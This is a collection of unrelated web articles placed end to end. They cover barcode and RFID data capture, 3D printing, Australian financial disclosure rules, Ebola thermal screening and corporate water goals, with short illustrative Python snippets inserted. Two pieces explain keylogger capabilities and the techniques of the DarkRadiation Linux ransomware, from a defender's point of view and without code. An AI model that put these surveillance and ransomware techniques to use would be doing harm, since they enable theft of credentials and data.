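The transmission-and-processing stage can be sketched as a small validation step that turns a raw capture into a normalized record before it enters CRM or BI systems. The field names and rules below are illustrative assumptions, not any particular vendor's schema:

```python
from dataclasses import dataclass


@dataclass
class ScanEvent:
    """Normalized record produced from one raw capture (names illustrative)."""
    device_id: str
    symbology: str   # e.g. "ean13", "qr", "rfid-epc"
    payload: str


def process(raw: dict) -> ScanEvent:
    """Validate one captured reading before it reaches downstream systems."""
    for field in ("device_id", "symbology", "payload"):
        if not raw.get(field):
            raise ValueError(f"missing {field}")
    payload = raw["payload"].strip()
    # Per-symbology checks catch scanner misreads early; EAN-13 payloads
    # must be exactly 13 digits, for example.
    if raw["symbology"] == "ean13" and not (len(payload) == 13 and payload.isdigit()):
        raise ValueError("EAN-13 payload must be 13 digits")
    return ScanEvent(raw["device_id"], raw["symbology"], payload)
```

Rejecting malformed captures at this boundary is what keeps the "actionable insights" downstream trustworthy: bad readings never reach the enterprise systems that decisions are based on.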
Identification, Access Control, and Security Biometric AIDC systems ensure secure access to physical spaces, computer networks, and confidential information. One of the earliest and most common AIDC use cases involves using a key card to access an office building. Manufacturing, Logistics, and Warehousing AIDC enhances production efficiency by enabling the real-time tracking of raw materials, work-in-progress items, and finished goods, resulting in streamlined operations and reduced downtime. For example, supplier data, material inventory levels, and machine performance can be accessed and tracked throughout the production process using a combination of AIDC technologies—typically IoT and sensor devices. Once items, products, or orders are assembled, AIDC facilitates precise shipment tracking, reducing errors, enhancing order fulfillment, and enabling efficient route optimization. Medicine and Healthcare Even the most typical, non life-threatening medical and healthcare scenario calls for minimal errors and an exceedingly high degree of accuracy and precision. To this end, AIDC is being used to quickly onboard new patients—for example, scanning and updating patient status and vitals quickly through different departments—and proactively track patient health and wellness. It’s also used widely in medication management through the use of auto-refilling prescriptions using QR codes and medical equipment monitoring. Parking and Transportation AIDC-based systems are employed in toll collection, electronic ticketing, and vehicle identification, enhancing traffic management and reducing congestion. For city dwellers in particular, AIDC is a highly visible, common fixture—from barcode scanning solutions for access control to parking lots to barcode-based ticket validation devices at train stations. 
Retail and Inventory Management AIDC technologies like barcodes and RFID tags have revolutionized inventory tracking, enabling retail and shipping enterprises to implement real-time stock monitoring and more efficient supply chain management. AIDC encompasses a diverse array of technologies, each catering to distinct requirements and industries. The following is an overview of the most prominent types. Barcodes are the oldest, most basic of AIDC types, invented over 70 years ago. The technology itself has changed relatively little since then—barcodes consist of patterns of parallel lines of varying widths that together represent data when scanned by a barcode reader. These days, this elemental AIDC type is a cornerstone of retail and inventory management, offering a cost-effective and efficient solution for standardized data collection across industries. Biometric AIDC uses a person’s unique physiological or behavioral traits for identification purposes. Common biometric identifiers include fingerprints, iris patterns, facial features, voiceprints, and even gait patterns derived through visual analysis. The Biometrics Institute has defined 16 different types of biometrics for automatically identifying people by their unique physical characteristics. Because they offer a high level of security and accuracy, biometrics are ideal for applications that demand stringent security and strong authentication measures (e.g., secure access control, employee time tracking, and identity verification). DNA | Ear shape/features | Eyes—iris | Eyes—retina | Eyes—scleral vein | Face | Finger geometry | Fingerprint | Gait | Hand geometry | Heartbeat | Keystrokes (typing) | Odor | Signature | Vascular (vein) | Voice | The Biometrics Institute has identified and defined 16 types of biometrics that can be used to automatically identify people by their unique physical characteristics. 
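Barcode symbologies build simple error detection into the encoded data itself. As a concrete example, the last digit of a 13-digit retail (EAN-13) barcode is a check digit computed from the first twelve, so a scanner can recompute it to catch misreads. A minimal sketch of that check:

```python
def ean13_check_digit(first12: str) -> int:
    """Compute the EAN-13 check digit: weight the 12 data digits
    1,3,1,3,... left to right, sum, and take the amount needed to
    reach the next multiple of 10."""
    if len(first12) != 12 or not first12.isdigit():
        raise ValueError("expected 12 digits")
    total = sum(int(d) * (3 if i % 2 else 1) for i, d in enumerate(first12))
    return (10 - total % 10) % 10


def is_valid_ean13(code: str) -> bool:
    """True if a full 13-digit code has a consistent check digit."""
    return (len(code) == 13 and code.isdigit()
            and ean13_check_digit(code[:12]) == int(code[-1]))
```

The check digit catches any single-digit misread and most transpositions, which is why the scheme has survived essentially unchanged since barcodes entered retail.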
Near Field Communication (NFC) NFC is a subtype of RFID that enables short-range communications between devices. NFC-enabled devices can establish connections by being in close proximity, typically within a few centimeters, for applications in contactless payment systems, access control, and data exchange between devices like smartphones and point-of-sale terminals. QR Codes A close cousin of the barcode, the QR code was developed for parts tracking during the automobile assembly process. These two-dimensional barcodes are capable of storing more data than traditional linear barcodes and can support a wide range of data types, including website URLs, contact information, product details, and more. QR codes have gained immense popularity due to their versatility, enabling marketers to engage customers with interactive content and information. Radio Frequency Identification (RFID) RFID technology uses radio frequency signals to enable wireless communication between an RFID tag and a reader. RFID tags come in passive and active forms. Passive tags derive power from the reader's signal and are suitable for applications like inventory management and supply chain tracking. Active tags have their own power source and can transmit data over longer distances, making them suitable for scenarios such as vehicle tracking and large-scale logistics. Benefits of AIDC Though AIDC technologies have been around for some time, they remain relevant due to their balance of simplicity, efficiency, security, and affordability. Each of the many types of AIDC offers a unique set of advantages—they should be selected based on application requirements, industry standards, and specific security considerations, among other factors. Regardless of the type, firms that implement AIDC technologies generally realize a wide range of benefits. Here are some of the most prominent.
By eliminating typos and human mistakes, organizations can achieve a high level of data accuracy and more reliable strategic decision-making. The automation of data collection reduces the time required to gather information, allowing employees to focus on more high order, value-added tasks. This optimization of human resources in turn boosts the enterprise’s overall operational efficiency. Enhanced Customer Experience AIDC technologies are especially prevalent in retail environments where they enhance customer experiences by simplifying processes like product information requests and checking out/completing purchases. By expediting and automating these previously high-touch interactions, AIDC helps to enhance customer satisfaction and loyalty through shorter wait times and smoother interactions. Real-Time Insights and Inventory Management AIDC technologies provide real-time data, enabling businesses to make informed decisions promptly. This agility enables organizations to respond promptly to changing conditions in response to market conditions and competitive activity. In retail, logistics, and warehousing, AIDC expedites and streamlines inventory tracking, helping to minimize stock-outs and reduce excess inventory. The results are leaner operations and improved levels of customer satisfaction. Biometric AIDC technologies ensure secure access to sensitive physical areas and environments, safeguarding both tangible and digital assets. By relying on unique physiological identifiers for authentication, biometric AIDC ensures that only authorized personnel are granted access to sensitive physical areas and online/offline resources. Bottom Line: Automating ID and Data Collection Despite being a relatively older set of technologies, automated identification and data collection (AIDC) continues to drive innovation and operational efficiency in modern enterprises and industries. 
Businesses apply the wide range of technologies to an even wider range of use cases that automate data collection, enhance accuracy, streamline operations, and improve security. Because it’s cost effective to implement, accurate, generally easy to use, and useful in many different applications, AIDC has become an indispensable tool in today’s data-driven world and will likely hold its place for the indefinite future. To learn more about software to help turn collected data into actionable insights, read Top 7 Data Analytics Tools next.
<urn:uuid:6a66aaea-82fe-441e-a318-49abc416e94a>
CC-MAIN-2024-38
https://www.datamation.com/big-data/automatic-identification-and-data-capture-aidc/
2024-09-13T07:49:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00032.warc.gz
en
0.904132
2,240
2.921875
3
A keylogger (also known as a keystroke logger) is software that monitors and records each keystroke on a keyboard and saves this information in a file or on a remote server. The program can collect information from computers, laptops, smartphones, and other mobile devices. Usually, such software is associated with spyware and is used for stealing passwords, logins, credit card information, and similar data. Keyloggers can be both legal and illegal. Such tracking applications can be used in workplaces or for researching users' behavior on computers and other gadgets. Cybercriminals often take advantage of such “spying” programs too, to steal personal information. However, even legal programs work without the monitored user's knowledge and consent, and malicious actors can also use them. Therefore, these tools shouldn't be treated as any less harmful than other parasites. If you suspect that your keystrokes might be recorded and used for illegal purposes, you should not hesitate to check the system with reputable anti-malware software. A professional and up-to-date tool should detect and remove a keylogger immediately. After that, changing all your passwords and monitoring bank transactions are crucial tasks to protect your privacy. Keyloggers can be divided into two categories – legitimate and malicious. The difference between hardware and software keyloggers There are two types of keyloggers available on the market: The hardware keylogger is a small physical device that can be placed between the keyboard's plug and the computer's keyboard port. A hardware keylogger records all keystrokes and saves them into its own memory. Such a device does not rely on particular software or a driver, so it can work in different environments. However, it does not take screenshots and can be easily found during a thorough computer inspection. Software keyloggers are divided into parasitical and legitimate applications.
Malicious keyloggers are very similar to viruses and trojans. They are used by hackers to violate users' privacy. Legitimate keyloggers, also known as computer surveillance tools, are commercial products targeted mostly at parents, employers, and teachers. They make it possible to find out what children or employees are doing online. Illegal and malicious use of the keylogger Practically all keyloggers seek to violate the user's privacy. They can track their victims for months and even years until they are noticed. During all this time, a regular keylogger is capable of finding out as much information about the user as possible. Someone who controls a keylogger gets priceless information, including passwords, login names, credit card numbers, bank account details, contacts, interests, web browsing habits, and much more. All this information can be used to steal the victim's documents and money. The main features of keyloggers - Logging keystrokes on the keyboard. - Taking screenshots of the user's activity on the Internet at predetermined time intervals. - Tracking the user's activity by logging window titles, names of launched applications, and other specific information. - Monitoring users' online activity by recording the addresses of visited websites, entered keywords, and other similar data. - Recording login names, details of various accounts, credit card numbers, and passwords. - Capturing online chat conversations on instant messengers. - Making unauthorized copies of outgoing and incoming e-mail messages. - Saving all collected information into a file on a hard disk, and then silently sending this file to a required e-mail address. - Complicating its detection and removal. Keyloggers cannot be compared with regular computer viruses. They do not spread themselves as those threats do and, in most cases, must be installed like any other software. However, the latest examples of ransomware have also been found to have keylogger capabilities.
Unfortunately, this suggests that malware will become even more sophisticated in the upcoming years. Methods used to spread and install keyloggers on the system As you already know, keyloggers can be legal and illegal. However, both are usually installed without the user's knowledge, though this is achieved using different methods. - A legitimate keylogger can be manually installed on the system by the developer, the system's administrator, or any other user who has the privileges needed for this activity. A hacker can also break into the system and set up a keylogger. In both cases, a privacy threat gets installed on the system without the user's knowledge and consent. - Malicious keyloggers can be installed on the system with the help of other parasites, such as viruses, trojans, backdoors, or other malware. They get into the system without the user's knowledge and affect everybody who uses the compromised computer. Such keyloggers do not have any uninstall functions and can be controlled only by their authors or attackers. In most cases, keyloggers affect computers running the Microsoft Windows operating system. However, all viruses are constantly updated, so there is no guarantee that they are not capable of hijacking other popular platforms. Examples of the most dangerous keystroke loggers There are lots of different keystroke logging applications, both commercial and parasitical. The following examples illustrate typical keylogger behavior. All In One Keylogger AllInOne keylogger has been actively used to track users worldwide. It is an illegal tool. All In One Keylogger is a malicious program targeted at PC users and their personal information. Typically, the people behind it seek to steal as much information as possible. AllInOne KeyLogger is designed to record all of the user's keystrokes, take screenshots, and initiate other activities. You can hardly notice this threat on your computer as it hides deep inside the system.
Ardamax Keylogger is a legitimate tool mostly used for research. However, some of its versions have already been compromised. Ardamax Keylogger is a legitimate program that was created for professional usage. However, cybercriminals managed to compromise version 4.6 of the program and used it for malicious purposes. Once users downloaded the program from the official website, it started collecting keystrokes, recording audio, and using visual surveillance, all of which was sent to the remote criminals' server. Invisible Stealth Keylogger Invisible Stealth Keylogger – a trojan horse with keystroke-logging functions. Invisible Stealth Keylogger is a harmful trojan horse with keystroke-logging functions. This parasite not only records every keystroke but also gives a remote attacker unauthorized access to the compromised computer. He or she can easily download and execute arbitrary code and steal the user's vital information (passwords, e-mail messages, or bank account details). Once it collects the needed amount of data, this threat sends it to the attacker through a background Internet connection. Moreover, such parasites can cause general system instability and even corrupt files or installed applications. Perfect Keylogger is used to collect users' keystrokes and passwords, take screenshots, and track users in other ways. Perfect Keylogger is a complex computer surveillance tool with rich functionality. It records all user keystrokes and passwords, takes screenshots, tracks user activity on the Internet, and captures chat conversations and e-mail messages. Perfect Keylogger can be remotely controlled. It can send gathered data to a configurable e-mail address or upload it to a predefined FTP server. Although it is a commercial product, it's even more dangerous than most parasitical keyloggers. Remove Keylogger with reputable security software There is no doubt that keylogging software poses a serious danger to users' safety.
Keylogger removal must be performed as soon as possible. As you already know, these types of programs can steal personal information and use it for further cybercrimes. Keystroke loggers might be hiding in the system and be invisible in the Task Manager. For this reason, you should use reputable anti-virus/anti-malware software to detect and eliminate this cyber threat. Also, make sure you fix the virus damage by running a full system scan with FortectIntego. It will recover your system to its previous state by eliminating changes initiated by the malware. If you have some difficulties and cannot remove Keylogger from the device or fix errors that it caused, you can share your question with us using the Ask Us page. We will be glad to help you solve your problems. Steps to take after keylogger removal Once you get rid of the keylogger, you should also take care of your personal information: - Change all of your passwords (email, social media, bank, etc.); - Set strong and unique passwords for each account; - Enable two-factor authentication to strengthen your accounts; - Monitor your banking transactions and if you notice suspicious transactions, inform your bank directly; - Install and regularly update antivirus software to make sure that any keyloggers are not trying to steal your personal information. Latest keyloggers added to the database Information updated: 2021-01-11
Now that 3D printers are cheaper to produce, experts predict it won’t be long before they are common in our homes. Even today, more companies realise the potential for 3D-printed applications in their own businesses. Since the technology moved from the theoretical to the real, people are expanding the boundaries of what’s possible to print, from very practical applications for manufacturing and medical devices to those just for fun. Here are just a few of the amazing real-world examples of 3D printing in 2018.

What is 3D printing?

3D printing had its start in the 1980s when Chuck Hull designed and printed a small cup. Also known as additive manufacturing, 3D-printed objects are created from a digital file by a printer that lays down successive layers of material until the object is complete. Each layer is a thinly sliced cross-section of the actual object, and the process uses less material than traditional manufacturing. Most materials used in 3D printing are thermoplastics—a type of plastic that becomes liquid when heated but solidifies when cooled without being weakened. However, as the technology matures, researchers are finding new materials—even edible ones—that can be 3D printed.

Prosthetic limbs and other body parts

From vets who have made a 3D-printed mask to help a dog recover from severe facial injuries to surgical guides, prosthetic limbs and models of body parts, the applications for 3D printing to impact medical strategies are vast. In an experiment conducted by Northwestern University Feinberg School of Medicine in Chicago, a mouse with 3D-printed ovaries gave birth to healthy pups, which could bode well for human interventions after more research is done.

Homes and other buildings

In less than 24 hours, a 400-square-foot house was constructed in a suburb of Moscow with 3D printing technology.
The possibilities for quickly erecting houses and other structures with 3D printing are intriguing when time is critical, such as creating emergency shelters after a natural disaster. Additionally, the potential to realise new architectural visions that weren’t previously possible with existing manufacturing methods will lead to design innovations. An entire two-storey house was 3D printed from concrete in Beijing in just 45 days from start to finish. Researchers from Germany even 3D-printed a house of glass, currently only available in miniature size, becoming the first to figure out how to 3D print with glass.

When you think about traditional cake decorating techniques—pushing frosting through a tip to create designs—it’s very similar to the 3D printing application process, where material is pushed through a needle and formed one layer at a time. Just as with 3D plastic printing, a chocolate 3D printer starts with a digital design that is sliced by a computer programme to create layers; then the object is created layer by layer. Since chocolate hardens quickly at room temperature, it’s an ideal edible material for 3D printing, but companies have printed other edible creations from ice cream, cookie dough, marzipan and even hamburger patties.

Defence Distributed was the first to create a 3D-printed firearm, in 2013, called the Liberator. While there are 3D printers that can use metal, they are very expensive, so the Liberator was printed using plastic. The advances of 3D technology and the ability to print a firearm at home have raised questions about how to address the technology in gun control regulations.
There are many applications for 3D printing in manufacturing across several industries, including automotive and aerospace: printing replacement parts for machinery, prototyping new products (with the added benefit of recycling the models after you’re done), and creating moulds and jigs to improve the efficiency of the production process. The bodies of electric vehicles and other cars have been 3D printed, and manufacturers can use 3D printing to lower costs and bring products to market quicker.

From an incredible 3Dvarius, inspired by a Stradivarius violin, to flutes and banjos, several musical instruments and parts of instruments such as mouthpieces have been created using a 3D printer. In fact, the world’s first live concert with a 3D-printed band (drum, keyboard, and two guitars) took place at Lund University in Sweden.

Anything your mind can imagine

The extraordinary thing about 3D printing is that it can be used to create just about anything your mind can conjure up; it just requires the digital file and the right material. While experts are still troubleshooting how to incorporate 3D printing processes into all areas, weekend warriors are finding all kinds of clever hacks to create with their 3D printers, including trash cans, cup holders, electric outlet plates and more.
Financial disclosure describes the duty of parties to disclose all information that may be pertinent to a court case. This process starts before the commencement of a court case and does not cease until the case is finalised. Each party must also disclose information as it comes to hand or if new information is created, and disclosure requirements apply to both physical and digital information. Financial disclosure ensures that both parties receive a just and equitable share of total assets. To achieve this, it relies on each party providing a detailed account of their financial standing. Financial disclosure is also central to reporting requirements for private and publicly listed companies, as well as charities and entities involved in elections and politics. While certain rules stipulate disclosure requirements in all court cases, additional rules are applicable in financial cases. These rules call for full and frank disclosure of each party’s direct and indirect financial circumstances. To that end, financial disclosure statements may include details about: Remember that these resources may be directly or indirectly related to a party. Direct involvement means the party owns the resource or has direct access to the earnings associated with that resource. Indirect involvement, on the other hand, describes resources and earnings that relate to another person or beneficiary. This may be a family member, but it can also be a company, corporation, trust, or associated structure. In family law cases heard in the Federal Circuit and Family Court of Australia (FCFCOA), any property disposal made in the 12 months before a separation of two parties (or since the final separation) must also be disclosed.
Here, the word “disposal” encompasses properties that are sold, transferred, assigned, or gifted. Financial disclosure statements must be filed online with the Commonwealth if an individual is party to a financial case related to: Rule 6.06(8) of the FCFCOA’s Family Law Rules requires that in cases involving property, each party must serve the other: Rule 6.06(1) of the Family Law Rules describes the general duty of financial disclosure. To that end, each party must also disclose: In the event a financial disclosure statement does not meet these criteria, an affidavit that provides further details must be filed. If a party’s financial circumstances change, they must file an Amended Statement within 21 days. An affidavit can also be used here if the changed circumstances can be described in 300 words or less. There are other contexts in which financial disclosure is not only important but a legal requirement. Part XX of the Commonwealth Electoral Act (1918) outlines a disclosure scheme that aims to increase transparency around the financial activity of political parties, political candidates, and other relevant stakeholders such as senators and donors. The scheme requires that some parties lodge annual returns, while others lodge returns after elections. Political parties, for example, have to provide public financial disclosures that include (but are not limited to): Since charities receive much of their funding from the government, public financial disclosure reports are made available to increase transparency and accountability around donations. The Australian Charities and Not-for-profits Commission (ACNC) outlines various best practices for charities to detail government contributions in their annual financial reports. Companies listed on the Australian Stock Exchange (ASX) must operate under continuous and periodic financial disclosure rules. Additional disclosure requirements are in place for oil, gas, mining, and exploration companies. 
What’s more, all companies operating in Australia are required to lodge financial reports with the Australian Securities and Investments Commission (ASIC). Annual financial reports are typically lodged at the end of the financial year and may be audited.
We build requirements at a quantum level to connect the vital elements which are needed to realize a requirement. As we consider the relationships between the behaviors, actions, and responses, we begin to identify and associate the characteristics and conditions which will drive and constrain the behaviors. Realizing a requirement means joining these elements together and noting them as elements of the requirement. Atoms make up the observable universe. Similarly, everything in our business solutions is, in a sense, made up of requirements, which, like atoms, serve as building blocks for all that "matters" to an organization. What if we could see our requirements as atoms? What would they look like? If we could split one open, what would be inside? Einstein taught us through the special theory of relativity that time and space are two parts of the same whole. We examine requirements in this way: we observe basic elements of a requirement which, upon closer examination, link to each other to the point where they are inseparable. The International Institute of Business Analysis (IIBA®) writes, "Business analysis is the practice of enabling change in an enterprise by defining needs and recommending solutions that deliver value to stakeholders." (International Institute of Business Analysis, 2015, p. 10) This requires a sophisticated means of eliciting and specifying requirements. "A requirement is a usable representation of a need. Requirements focus on understanding what kind of value could be delivered if a requirement is fulfilled. The nature of the representation may be a document (or set of documents), but can vary widely depending on the circumstances." (International Institute of Business Analysis, 2015, p. 48) "[A requirement is] A condition or capability that must be met or possessed by a system, product, service, result, or component to satisfy a contract, standard, specification, or other formally imposed documents. 
Requirements include the quantified and documented needs, wants, and expectations of the sponsor, customer, and other stakeholders." (Project Management Institute, 2004, p. 371) The IIBA and Project Management Institute (PMI) alike have done a good job at helping us understand the extrinsic value of requirements. Requirements are used to solve problems, satisfy needs, and build solutions. They have extrinsic value because they begin a causal chain of events that eventually brings us to realized value for the organization and its stakeholders. However, neither the IIBA nor PMI explains the intrinsic value of a requirement. The fundamental elements of a requirement give rise to its intrinsic value. Understanding the very nature of those elements is essential to eliciting, planning, analyzing, communicating, and managing them. Because of this basic lack of understanding, we get sporadic arrangements of text, tables, and diagrams, which may or may not reside within a single document. Often conceived with minimal traceability, requirements exist as seeds spread across many packages or across many pages of the same document. What if there was a way to solve this problem? It would mean we would have to abandon decades of thinking and begin redefining the very nature of the word "requirement." When we only understand requirements extrinsically, we are doing so in a classical sense. When we add an intrinsic aspect, we are understanding requirements at a quantum level. There are two ways to think of requirements: classical and quantum. Requirements, conveyed to stakeholders as textual specifications or graphic images, are classical when they are elicited and recorded as a single declarative statement or image, across a single document or a collection of artifacts packaged together in separate smaller documents. In a classically defined environment, the business analyst would typically ask, "What are your requirements, stakeholders?" 
Appendix-A details examples of classically specified requirements found within a generic Business Requirements Document. Some of these requirements may be poorly stated and disorganized. This is by design and representative of many of the requirements we come across. We also notice that many of these requirements relate to each other in some way. Figure 1 illustrates an example of requirements that, when separated by many pages within the document, can cause potential design, development, and testing errors. Again, this is common amongst requirements packages and documents.
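The "atomic" view described above, a requirement whose behaviors, characteristics, and conditions are kept together as inseparable linked elements rather than scattered across a document, can be pictured with a hypothetical data structure. The field names below are illustrative and do not come from the IIBA or PMI:

```python
from dataclasses import dataclass, field

@dataclass
class Requirement:
    """A 'quantum' requirement: the statement plus the linked elements
    that drive and constrain it, held in one traceable unit."""
    statement: str
    behaviors: list = field(default_factory=list)        # actions and responses
    characteristics: list = field(default_factory=list)  # qualities driving the behavior
    conditions: list = field(default_factory=list)       # constraints on the behavior
    linked_to: list = field(default_factory=list)        # traceability to related requirements

req = Requirement(
    statement="The system shall notify the account holder of each withdrawal.",
    behaviors=["send notification"],
    characteristics=["notification is near real-time"],
    conditions=["only for withdrawals over $100"],
)
print(req.statement)
```

Because the elements travel with the statement, a reviewer sees the driving conditions and constraints in one place instead of across many pages.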
Cybersecurity is becoming increasingly significant due to the increased reliance on computer systems, the Internet and wireless network standards such as Bluetooth and Wi-Fi, and due to the growth of smart devices and the various devices that constitute the ‘Internet of things’. Owing to its complexity, both in terms of politics and technology, cybersecurity is also one of the major challenges in the contemporary world. Where did it all begin? We take a look at the history of cybersecurity from inception to the present day.

1970s: ARPANET and the Creeper

Cybersecurity began in the 1970s when researcher Bob Thomas created a computer programme called Creeper that could move across ARPANET’s network, leaving a breadcrumb trail wherever it went. Creeper was the first self-replicating programme, making it the first-ever computer worm. Ray Tomlinson, the inventor of email, wrote the programme Reaper, which chased and deleted Creeper, making Reaper the very first example of antivirus software.

1980s: Birth of the commercial antivirus

1987 was the birth year of commercial antivirus, although there were competing claims for the innovator of the first antivirus product. Andreas Lüning and Kai Figge released their first antivirus product for the Atari ST, which also saw the release of Ultimate Virus Killer in 1987. Three Czechoslovakians created the first version of the NOD antivirus in the same year, and in the US, John McAfee founded McAfee and released VirusScan.

1990s: The world goes online

With the internet becoming available to the public, more people began putting their personal information online. Organised crime entities saw this as a potential source of revenue and started to steal data from people and governments via the web. By the middle of the 1990s, network security threats had increased exponentially and firewalls and antivirus programmes had to be produced on a mass basis to protect the public. 
2000s: Threats diversify and multiply

In the early 2000s, crime organisations started to heavily fund professional cyberattacks, and governments began to clamp down on the criminality of hacking, giving much more serious sentences to those culpable. Information security continued to advance as the internet grew, but, unfortunately, so did viruses.

2021: The next generation

The cybersecurity industry is continuing to grow at the speed of light. The global cybersecurity market size is forecast to grow to $345.4bn by 2026, according to Statista. Ransomware is one of the most common threats to any organisation's data security and is forecast to continue to increase.
A Centers for Disease Control (CDC) advisory states: “People who have been exposed to Ebola should not travel on commercial airlines until there is a period of monitoring for symptoms of illness lasting 21 days after exposure.” This has presented a conundrum for officials in West Africa, especially airport security workers. How to determine symptoms in passengers who are in their presence for but a few moments? One solution they’ve been employing is to take temperatures, a time-consuming practice. Might using thermal imaging cameras speed up the process? Since one of the symptoms of Ebola is a temperature of 101.5°F or more, temperature-taking has emerged as a daily routine in some countries. You know those signs posted in US bathrooms reminding employees to wash their hands? They’re nothing compared to Liberia’s Ebola-fighting hygiene requirements.

Hygiene and Health Surveillance

Nicole Beemsterboer, an NPR producer just back from ten days in Liberia, reports in her blog, Goats and Soda, that there are buckets of chlorine everywhere, and before granting admittance to any government buildings, officials watch employees and visitors wash their hands. Then they take each person’s temperature with an ear-gun thermometer. The temperature is then written or printed on an ID tag and attached to the person’s clothing, where it will be visible to all inside (who are also wearing tags). Anyone with an elevated temperature is sent to a medical facility for further screening. One can only imagine the long queues forming each morning as employees arrive for work. But that’s nothing compared to the lines at airports. As if clearing customs didn’t take enough time, passengers departing from many West African airports also have to have their temperatures taken with an ear-gun. When Beemsterboer’s plane landed in Casablanca from Liberia, the passengers underwent a different type of screening. 
In an effort both to speed up the process and to provide officials with a bit more distance from potentially Ebola-infected passengers, many airports are turning to thermal imaging cameras.

Thermal Imaging Cameras as Homeland Security

Reuters also reports that several Asian countries are employing thermal imaging screening as a pre-boarding requisite, as well as at major entry points along their borders. Since everything, whether animate or inanimate, gives off heat in the form of energy waves, thermal imaging sensors have long been used to measure the intensity of those waves. Military applications like night goggles, heat-seeking sensors, and cameras have long been a wartime staple. And now, thermal imaging cameras are perched on a new threshold of possibility. Since the human body is constantly radiating thermal energy, the cameras’ sensors are able to collect and convert it into a temperature measurement. Thermal imaging cameras and sensors portray temperature on a progressive rainbow palette, with cold at the purple, blue, and green end, and hot at the yellow, orange, and red end. When detecting temperature in humans, exposed skin of the arms and face will always show up warmer. The warmest area is the area surrounding the tear ducts; the coolest area is the nose, usually seen as blue or green, since it is the cooling mechanism for the air we breathe as it enters the body. However, should a person be running a fever, there will be a higher proportion of reds in the thermal image and perhaps a few white areas. The image on the left is of a healthy individual; on the right is an individual running a fever. An elevated temperature can be caused by any illness or inflammation, so using thermal cameras is far from a complete solution to detecting Ebola. 
But they can be a tool for filtering out people travelling while ill, allowing security officials to remove an individual from the boarding line and put him or her into isolation until a blood test, which is the only definitive test for Ebola, can be administered.
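The screening logic described in this article reduces to a simple threshold test: flag anyone at or above the 101.5°F fever mark cited by the CDC for secondary checks. A minimal sketch (function names are illustrative):

```python
FEVER_THRESHOLD_F = 101.5  # CDC-cited Ebola fever symptom threshold

def fahrenheit_to_celsius(temp_f):
    """Convert a Fahrenheit reading to Celsius."""
    return (temp_f - 32) * 5 / 9

def needs_secondary_screening(temp_f):
    """Flag a passenger for isolation and a confirmatory blood test."""
    return temp_f >= FEVER_THRESHOLD_F

print(needs_secondary_screening(98.6))   # False: normal body temperature
print(needs_secondary_screening(102.1))  # True: pull aside for testing
```

In practice a thermal camera reads skin temperature, not core temperature, so deployed systems calibrate the cutoff rather than using the clinical value directly.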
Microsoft plans to become water positive for its direct operations by 2030, replenishing more water than it consumes on a global basis. The company said it will put back more water in stressed basins than its global water consumption across all basins. "Our replenishment strategy will include investments in projects such as wetland restoration and the removal of impervious surfaces like asphalt, which will help replenish water back into the basins that need it most," President Brad Smith said in a blog post. "We will focus our replenishment efforts on roughly 40 highly stressed basins where we have operations. This reflects a science-based assessment of the world’s water basins. The majority of the world’s freshwater is divided into 16,396 basins, each of which has been assigned a 'baseline water stress' score by the World Resources Institute (WRI), a leading nonprofit global research organization that focuses on natural resources. A basin is considered 'highly stressed' if the amount of water withdrawn exceeds 40 percent of the renewable supply. Globally there are 4,717 basins that fall into this category." Among the water-saving projects underway, its new Silicon Valley campus will include an on-site rainwater collection system and waste treatment plant that will save an estimated 4.3 million gallons of potable water per year. Over in Herzliya, Israel, the campus features plumbing fixtures that improve water conservation by 35 percent, and water collected from air conditioners will be used to water plants on-site. In India, the newest building on its Hyderabad campus will "support" 100 percent treatment and reuse of wastewater on-site for landscaping, flushing, and cooling tower makeup. Over in Puget Sound, the company's redevelopment of its headquarters will reuse rainwater, saving 5.8 million gallons a year. Its Arizona data center region, expected next year, will use zero water for cooling for more than half the year. 
When temperatures rise above 85°F (29.4°C) and adiabatic cooling is no longer possible, it will use an evaporative cooling system. Microsoft also plans to be carbon negative by 2030 and, by 2050, to remove all the carbon it has emitted since its founding. Also by 2030, it hopes to become a zero-waste company, recycling servers and other waste from its direct operations.
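The Arizona region's cooling policy described above amounts to a mode switch on outside air temperature: water-free cooling at or below 85°F (29.4°C), evaporative cooling above it. A simplified illustration (the real control logic is of course far more involved):

```python
CUTOFF_F = 85.0  # above this, water-free cooling no longer suffices

def cooling_mode(outside_temp_f):
    """Pick the cooling mode for the Arizona data center region as
    described in the article: zero-water cooling for most of the year,
    evaporative cooling only on hot days. Simplified sketch."""
    return "water-free" if outside_temp_f <= CUTOFF_F else "evaporative"

print(cooling_mode(70.0))  # water-free
print(cooling_mode(95.0))  # evaporative
```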
Ransomware is one of the most prolific and dangerous cybersecurity threats facing computer users worldwide. Modern ransomware operators target a variety of platforms, including Linux. Organizations rely heavily on Linux for critical infrastructure, such as cloud environments and servers, making them attractive targets for ransomware operators and other Advanced Persistent Threat (APT) groups. “Double extortion” is a tactic commonly employed by ransomware operators. In addition to encrypting an organization’s files and demanding a ransom for the decryption key, attackers exfiltrate sensitive data. If the organization fails to pay the ransom, the attackers threaten to release the stolen data publicly or sell it. Such data leaks can be devastating, as the exposure of sensitive information can lead to a catastrophic loss of trust with consumers, who may choose to take their business elsewhere. This article will examine the growing trend of attackers targeting Linux systems and explain how to protect your systems against these threats.

The Evolution of Ransomware and Its Impact on Linux Systems

Ransomware is malware that encrypts a victim’s data and demands payment for the decryption key. Victims usually receive a dark web link, accessed through The Onion Router (TOR), to ensure the attackers’ anonymity. The link contains instructions on how to make a cryptocurrency payment to meet the ransom demand. Linux was once considered a less likely target for ransomware, but this perception has changed drastically. Linux now powers many of the world’s servers, data centers, and cloud environments, making it increasingly vulnerable to malware operators seeking large ransom payouts from organizations.

Examples of Ransomware Campaigns Targeting Linux Systems

Let’s review a few of the most recent ransomware types targeting Linux systems: DarkRadiation is a ransomware variant that targets Red Hat and Debian-based Linux distributions. 
Discovered in 2021, DarkRadiation is notable for using Bash scripts to execute malicious commands. It spreads through networks by leveraging Secure Shell (SSH), exploiting systems with weak credentials and unpatched vulnerabilities. DarkRadiation uses obfuscation techniques such as base64 encoding and encryption via OpenSSL to evade detection. Once executed, the malware encrypts the victims’ files using the AES-256-CBC algorithm and appends the “.encrypted” extension to the affected files. The victim then receives a ransom note.

